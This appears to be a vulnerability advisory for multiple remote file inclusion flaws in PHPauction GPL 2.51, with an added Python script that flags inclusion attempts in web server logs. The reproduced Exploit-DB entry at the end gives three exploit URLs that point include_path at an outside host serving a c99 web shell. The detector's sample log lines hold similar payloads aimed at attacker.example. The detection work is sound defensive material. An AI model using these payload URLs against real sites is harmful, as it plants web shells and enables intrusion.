Vendor: PHPauction GPL Enhanced
By: RoMaNcYxHaCkEr
CVSS: 8.8 (HIGH)
Title: Multiple Remote File Include Vulnerabilities
CWE: 98
Product Name: PHPauction GPL Enhanced
Affected Version From: 2.51
Affected Version To: 2.51
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpauction:phpauction_gpl_enhanced:2.51
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHPauction GPL 2.51 Multiple Remote File Include Vulnerabilities

PHPauction GPL 2.51 contains multiple remote file include vulnerabilities in the converter.inc.php, messages.inc.php and settings.inc.php files. An attacker can exploit them by sending a specially crafted HTTP request that supplies a malicious URL in the include_path parameter, which can allow execution of arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of PHPauction GPL 2.51 software.
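
Detection example (added here; not part of the original advisory or the Exploit-DB entry): the script below scans web server access logs for requests to the three named scripts and flags those whose include_path value is a URL. The combined log format, the client addresses and the attacker.example host name are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script names and parameter taken from the advisory.
SCRIPTS = {"converter.inc.php", "messages.inc.php", "settings.inc.php"}
PARAM = "include_path"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with scheme:// or // names a resource on another host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def classify(line):
    """Return 'rfi-attempt', 'direct-include-request' or None for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1].lower() not in SCRIPTS:
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if name == PARAM and REMOTE.match(unquote(value)):
            return "rfi-attempt"
    # Include fragments are not meant to be requested by a browser at all.
    return "direct-include-request"

def scan(lines):
    """Return (client_ip, verdict) for every line that matches either rule."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

# Constructed sample lines (documentation IP ranges, placeholder host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Mar/2008:10:00:01 +0000] "GET /auction/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Mar/2008:10:02:13 +0000] "GET /auction/includes/converter.inc.php?include_path=http://attacker.example/payload.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [17/Mar/2008:10:02:20 +0000] "GET /auction/includes/messages.inc.php?include_path=%68ttp%3A%2F%2Fattacker.example%2Fpayload.txt HTTP/1.0" 200 298',
    '203.0.113.5 - - [17/Mar/2008:10:05:44 +0000] "GET /auction/includes/settings.inc.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

A "direct-include-request" hit is the weaker signal: it only shows that an include file was requested directly, without a URL in include_path.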

Exploit-DB raw data:

# Name : PHPauction GPL 2.51 Multiple Remote File Include Vulnerabilities

# Download From : http://www.johnrayfield.com/phpauction/phpauction-gpl-enhanced-251.zip

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , alwheed )        

# Home Page :  WwW.4RxH.CoM              

+============================================================================+

# Vulnerable Code In Files converter.inc.php & messages.inc.php & settings.inc.php In Different Lines

# Exploits :

http://4RxH.CoM/auction/includes/converter.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

http://4RxH.CoM/auction/includes/messages.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

http://4RxH.CoM/auction/includes/settings.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

That's It

Good Luck Everybody

+============================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : RxH@HotMail.iT

# Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That's My Mistake

RxH

Best Wishes

# milw0rm.com [2008-03-17]